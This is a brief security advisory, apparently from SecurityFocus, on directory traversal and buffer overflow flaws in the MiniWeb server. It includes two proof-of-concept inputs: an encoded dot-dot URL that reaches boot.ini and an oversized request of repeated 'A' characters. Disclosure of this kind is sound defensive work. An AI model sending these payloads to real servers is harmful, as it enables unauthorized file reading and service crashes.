MiniWeb Directory Traversal and Buffer Overflow Vulnerabilities

Exploit code and proof-of-concept examples are available:

http://www.example.com/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/boot.ini

GET /AAAA...[3600 - 4000]...AAAA/ HTTP/1.0


 

Privacy Statement
Copyright 2010, SecurityFocus